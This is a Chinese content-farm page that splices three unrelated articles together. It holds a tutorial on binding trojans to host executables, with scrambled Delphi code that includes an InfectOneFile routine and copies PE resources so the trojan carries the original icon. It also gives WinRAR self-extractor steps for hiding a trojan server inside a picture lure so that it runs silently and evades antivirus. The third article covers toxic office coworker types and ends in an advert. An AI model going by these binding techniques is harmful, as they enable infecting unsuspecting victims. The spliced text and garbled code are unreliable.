篇一:病毒木马程序的感染和捆绑方式
最近在研究病毒木马程序的感染和捆绑方式。
发现文件困绑有多种方式 我只和大家探讨两种方式 一种是附加的方式,一种是内嵌式
第一种方式 就是将木马程序附加在别的程序头部 也就是说 运行的目标程序是木马
然后木马程序将原程序解压出来再运行 听说熊猫烧香的程序用的就是这种方法
这种方式有缺点也有优点
优点是:
可以捆绑任何程序
缺点是:
运行时需要把目标程序给拷贝出来然后 然后再运行真正的程序 这种方法容易使人察觉出来被捆绑,并且如果目标程序大的话运行速度会比较慢
实现方法:(Demo下载)
如果不改变图标,实现方法是非常简单的。
用文件流的方式 把目标程序写在木马程序后面
这里提供修改图标的实现方法,就是替换目标程序里的所有资源,如果资源文件被压缩,捆绑将出错
(目前网络上有很多获取图标的方法,比如用ExtractIcon获取目标程序中的图标 这种方法读取出来的图标
和原程序的图标是有差别的。 就是颜色会浅一点, 让人一看就知道程序可能被捆绑过了)
请勿用于病毒传播,这里只贴出核心代码
【全文】
function Align(Size, AlignBase: integer): Integer;
begin
if Size mod AlignBase <> 0 then
Result := (Trunc(Size / AlignBase) + 1) * AlignBase
else
Result := Size;
end;
var
I:integer;
DosHeader: TImageDosHeader;
NTHeader: TImageNtHeaders; {NtHeader}
dRead: DWORD;
begin
SetFilePointer(AFHandle, 0, nil, FILE_BEGIN);
ReadFile(AFHandle, DosHeader, SizeOf(TImageDosHeader), dRead, nil);
//非PE 退出
if not DosHeader.e_magic = IMAGE_DOS_SIGNATURE then Exit;
SetFilePointer(AFHandle, DosHeader._lfanew, nil, FILE_BEGIN);
ReadFile(AFHandle, NTHeader, SizeOf(TImageNTHeaders), dRead, nil);
//非PE 退出
if NTHeader.Signature <> IMAGE_NT_SIGNATURE then Exit;
SetFilePointer(AFHandle, DosHeader._lfanew+SizeOf(TImageNtHeaders), nil, FILE_BEGIN);
for i := 0 to NTHeader.FileHeader.NumberOfSections - 1 do
begin
ReadFile(AFHandle, ASectionHeader, SizeOf(TImageSectionHeader), dRead, nil);procedure GetRsrcStream(AFHandle: THandle; var AStream: PStream;var ASectionHeader: TImageSectionHeader);
if ASectionHeader.VirtualAddress = NTHeader.OptionalHeader.DataDirectory[2].VirtualAddress then
begin
SetFilePointer(AFHandle, ASectionHeader.PointerToRawData, nil, FILE_BEGIN);
SetLength(AStream, ASectionHeader.SizeOfRawData);
ReadFile(AFHandle, AStream[0], ASectionHeader.SizeOfRawData, dRead, nil);
Exit;
end;
end;
end;
function StripHighBit(L: Longint): DWORD;
begin
Result := L and $7FFFFFFF;
end;
function HighBitSet(L: Longint): Boolean;
begin
Result := (L and $80000000) <> 0;
end;
function IsDirectory(ResourceDirectoryEntryImageResourceDirectoryEntry; BaseEntry: DWORD): boolean;
begin
Result := HighBitSet(PImageResourceDirectoryEntry(StripHighBit(ResourceDirectoryEntry^.OffsetToData) +
BaseEntry + SizeOf(TImageResourceDirectory))^.OffsetToData);
end;
begin
+
BaseEntry + SizeOf(TImageResourceDirectory))^.OffsetToData + BaseEntry);
end;
var
I: Integer;
ResourceDirectoryEntryImageResourceDirectoryEntry;
Data: PImageResourceDataEntry;
begin
Result := True;
ResourceDirectoryEntry := PImageResourceDirectoryEntry(DWORD(ResourceDirectory)
+ SizeOf(TImageResourceDirectory));
for I := 0 to ResourceDirectory^.NumberOfIdEntries + ResourceDirectory^.NumberOfNamedEntries - 1 do
begin
if IsDirectory(ResourceDirectoryEntry, BaseEntry) then
begin
{目录递归调用,把下级的资源列出来}
function FixRsrc(ResourceDirectoryImageResourceDirectory; BaseEntry,OldVA, NewVA: DWORD):boolean;Result := PImageResourceDataEntry(PImageResourceDirectoryEntry(StripHighBit(ResourceDirectoryEntry^.OffsetToData) function ResourceDataEntry(ResourceDirectoryEntryImageResourceDirectoryEntry; BaseEntry: DWORD)ImageResourceDataEntry;
FixRsrc(PImageResourceDirectory(StripHighBit(
ResourceDirectoryEntry^.OffsetToData)+ BaseEntry),
BaseEntry, OldVA, NewVA);
end
else
begin
{资源}
Data := ResourceDataEntry(ResourceDirectoryEntry, BaseEntry);
//修正RVA
Data^.OffsetToData := Data^.OffsetToData - OldVA + NewVA;
end;
inc(ResourceDirectoryEntry);
end;
end;
function InfectOneFile(ASrcFileName,ADesFileName,ANewFileName: string): string;
var
F,F1,F2: THandle;
dRead: DWORD;
fsDes, fsSrc, len, i, lastPos, oldSize: integer;
pRsrc,LoadStream: PStream;
DosHeader: PImageDosHeader;
NTHeader: PImageNtHeaders; {NtHeader}
篇二:永远不会被杀的捆绑器
永远不会被杀的捆绑器
好久没写教程了,这段时间简直是忙的要死,所以,我的"电脑入门教程"还没有继续往下写!~
今天特别推出了,"电脑入门教程之号外篇"!~
动感超人又来教大家做坏事了!~(不要骂我啊!~)今天只是教给大家一个小技巧,全无任何技术可言,希望大家不要见笑!~也请以前就掌握的朋友不要骂我啊!~
从复一句话:高手勿看,菜鸟朋友可看可不看!~(呵呵!~)
在入侵的很多时候,我们都要利用木马做陷阱,让对方去踩!~但是我们的陷阱最不能太暴露吧!~有很多人都是用一个捆绑器,把木马的服务端捆绑上一个图片,在改一个诱人的名字,但是大部分的捆绑器都会被各大杀毒软件查杀,很多菜鸟朋友都不敢使用,我现在特别像大家介绍一个永远不会被查杀的捆绑器!~WINRAR!~如果它都会被查杀的话,那我想杀毒软件厂商的头脑一定有问题!~
不了解的朋友会问,WINRAR是一个非常优秀的压缩软件啊!~对我们就是用它来捆绑文件!~
具体步骤如下:
1.拿一个木马的服务端和一张图片,由于我是在本机演示,所以我用的是一张图片+"冲击波"病毒专杀工具!~(汗,我肯定不敢用木马啊!~要不我的电脑就麻烦了!~)OK,选中他两然后右击,添加为压缩文件!~
2.打开这个生成的RAR文件,选中任务拦上的"自解压",在弹出的对话框中选择"高级自解压选项"!~
在解压路径中写上你要解压的路径,我这里就
写"%systemroot%\temp",%systemroot%\temp表示系统安装目录下的temp文件夹,一般是c:\winnt\temp文件夹!~或者要写其他的路径随便大家了!~
然后在"解压后运行"里面写出你木马的程序名称,"解压前运行"里面写出你图片的名称!~
3.在"模式"里,点上"全部隐藏"和"全部隐藏"!~
4.在到"文本和图标"里去选择你要用的图标!~
呵呵,不要说你的电脑上没有图标啊!~你在开始-搜索里去搜索,后缀名的为*.ico的图片,呵呵怎么样一大堆吧!~
篇三:办公室里的十大毒人
【第一类毒人:祥林嫂】
警示性特征:
她们的服装色调沉重单一,以黑灰蓝为主;她们似乎少年老成,饱尝人世的沧桑,眉头总是拧着;在她们眼中,公司的一切待遇都是不公平的,公司的一切领导都是该杀的,工作中的一切同事都是愚蠢无能的。每当旁人问到她的近况,都会习惯性的回答:“不太好。是这样的,你听我说。”她们对快乐不屑一顾,却从不吝啬使用尖酸刻薄的词语来指责他人。牢骚满腹、怒气冲天,是“祥林嫂们”最显著的特征。
典型嘴脸:
坐我旁边的一名女同事腿上有块地方蜕了皮,我可不敢问她怎么回事,我知道只要开口一问,她准会从交通状况谈到个人医疗保险,没半小时完不了。其实只要她一出现在办公室里,我就无法逃脱那长达数小时的心理折磨,她真的会一天都在“唐僧”似的编派单位的不是,从前台到老总,再到扫卫生的阿姨骂个够,然后再说到自己命运有多么悲惨,窝在这个小地方难放光辉。明明是些和自己无关的事情,可在她持续不断的轰炸之下,我不得不想尽办法摆脱她那极具传染力的消极情绪。记得一次新员工大会结束后,几个刚来的大学生正摩拳擦掌热血沸腾,她却不冷不热地来了一句:“在这种鬼地方,甭想有发展的机会。”影响实在是太坏了!——舒蒙26岁市场助理
【第二类毒人:小喇叭】
警示性特征:
“嗒嘀嗒,小喇叭开始广播了。”不要以为小喇叭这么好当。她首先要具备做间谍的本领,有捕风捉影洞察力和锲而不舍、不怕白眼的决心;还要兼具做主播的天分,能把看来的、听来的,甚至编来的故事讲得头头是道,惟妙惟肖。这种人是办公室谣言的集散地,是茶水房里的大红人,以制造、传播谣言为乐。在这个信息的社会,你可千万不能小看她的功用,有了她,你就可以随时把握公司的动向,站在公司“小道消息”的前沿,可万一你招惹了这个口无遮拦的嚼舌者,很有可能就被她搞得名声扫地。
典型嘴脸:
她又一脸神秘的朝你走过来了,“你知道吗?研发部那个秘书小王,就是头发长长的那个,怀孕了!嘿嘿,她才20岁,而且没男朋友,你说这肚子怎么鼓起来的?”每次她拉着椅子坐到你身边,准是说个没完,从行政总监的“性丑闻”到财务家小Baby的睡觉姿势,俨然新闻发言人。那么敏感的场所,那么敏感的话题,真叫我不知如何是好。消息来源是否可靠先不说,关键的是,她从来就不
在乎我对她那一箩筐的“内幕秘闻”感不感兴趣! ——丽美28岁程序员
【第三类毒人:马屁精】
警示性特征:
可以说几乎所有人都见识过这类人,开大会的时候永远坐在第一排;集体会餐的时候就算把自己喝得七荤八素,也得跟领导推杯换盏;时时在伺机捕捉任何一个能趋炎附势、令自己一步登天的机会。人往高处走,这是一种普遍心态,可怕的是“马屁精”中有一种人,她通过踩扁身边的人,来达到自己高升的目的。她有很多花招可耍,或者打小报告,故意贬低你,或者直截了当地在上司面前要你难堪,领导训斥你的时候,她会微笑着充当“敲锣边”者,让你猝不及防,瞬间变成个胡言乱语的大白痴。
典型嘴脸:
我们部门几个同事一直都聚在同一张桌上共进工作午餐,除了一个叫雪琪的,每次她总是孤傲地独坐一隅。有一天,副总裁亲临餐厅和我们一起进餐,雪琪眼尖,飞也似地挤到了我们的身边,一来想营造一个“合群”的好印象,二来有机会和副总裁套近乎。更可恶的是,她总喜欢让同事在上司面前扮演没头苍蝇的角色,一次会上,大老板提到要寻找新客户,她立刻转过脸来对我说:“好好想想,为什么我们找不到新的计划呢?”这是她最基本的工作职责,却把我当挡箭牌,我一时说不出话来,显得像个无能的傻瓜。 ——Lucy 27岁广告客户经理
【第四类毒人:假凤凰】
警示性特征:
这号人的座右铭是“酒香就怕巷子深”。她要让追光灯一直以她为对象,要处处显得比别人优越,她们自恃小有姿色,会不失时机地在男同事面前充分施展女性魅力,你说什么她都要插嘴,每一件事她都要证明她知道得比你多——她的嗓门一定是办公室里最大的。
她们随意的走过来,轻描淡写地说上几句,就可以毫不留情地把你撕成碎片;她们那熟练的用眼角瞥人的技术,可以毫不费力的贬低你的穿着、你的社交圈和你喜爱的人,贬低人和超出她们“什么都见过、什么都经过”标准的事物。她要你在她们身边,就像一个笨拙的中学生,总是渴望能被班上最出风头的那一伙吸纳,人家却连正眼都没有扫上过你。
典型嘴脸:
她表现得实在是太夸张了!谈起以前的经历夸夸其谈得让人惊讶,22岁的年纪,去过70多个国家,拿着N多国的签证,遥远的异国她乡,有无数金发碧眼或者黑肤黑发的男人为她愈生愈死;来到公司之前,经营着一个规模不小的跨
国公司,职员若干,钱财不少——这里实在是太屈才了!听得我们瞠目结舌,她则仿佛一个骄傲的孔雀,说话做事都拿着劲儿,永远俯视着她人,俨然是办公室里的巨星! ——徐徐26文员
在团队里,表面上一池静水,暗地里却暗流涌动。其中"传染"最快的不是那些鼓舞人心、积极向上的信息和能量,而是那些让人消极、倦怠的行为和能量。这些人传递的负面,会影响整个团队的士气,更危险的是它将大大削弱员工的工作积极性和创造性,并给员工的心理上造成强大抵触情绪,一不小心好员工就跌入“负面深渊”中。
这些”病毒”毫无声息的发生在你公司,你知道吗?负面言论和行为是一种慢性传染病,如果不把这病源给治好,不仅影响着你公司的好员工,时间久了更是一种常见的“恶性企业文化”,你的公司将会面临怎样的危机?员工工作效率下降?还是人才被同化?
如何彻底的解决这一“毒人”现象?
积极向上的团队文化,对一支军队来讲,是战场上取得胜利的重要保障;任何一个员工在日常工作中的一举一动,都起着榜样作用,无论是正面的还是负面的,时刻影响着企业的生存环境,影响着其他员工。传统企业会靠相应的规章制度来约束这些现象,但最终都会成为一堆白纸,执行不下去,一段时间后变成了:“正面往上传,负面往下传,八卦漫天传“。等你反映过来的时候,为时已晚……
【壹企观点】
积分制管理用积分去引导、用积分去约束、用积分去影响
积分制管理用没有成本的阿拉伯数字奖扣管理,不停的给员工信号,引导员工传递正面积极的能量,做正面积极的事,并将员工做的任何一件事与积分挂钩,做的每一件好事,每一件坏事都记录在公司司册,不断强化员工的工作秩序和风气,在员工灵魂深处快速的产生强大的内驱动力,用积分去约束、克服众多的不良行为,形成一个健康良好的企业文化。
积分制管理用最简单的方式全方位量化考核,分各类名次奖公开排名奖励真正为公司创造价值的员工,树立优秀的团队榜样,引导员工形成良好的竞争氛围,促使员工克服不良行为,形成一个具有竞争力的团队,充分发挥员工的积极性和创造力,拿到公司想要的结果。同时积分制管理把员工梦寐以求的奖励如:奖金、福利、晋升、荣誉、旅游、出国、年终奖、股权等等,与积分挂钩,并向高分群体倾斜,用利益机制形成持续的驱动力,从而自觉的把自身利益与公司利益捆绑在一起,充分、全方位调动员工的积极性。
免费论文网友情提示:本网站所有内容为共享上传提供,不涉及任何商业利益,本站对此不承担任何保证责任!
Copyright © www.csmayi.cn Corporation, All Rights Reserved 共享时代 共享你我他 版权所有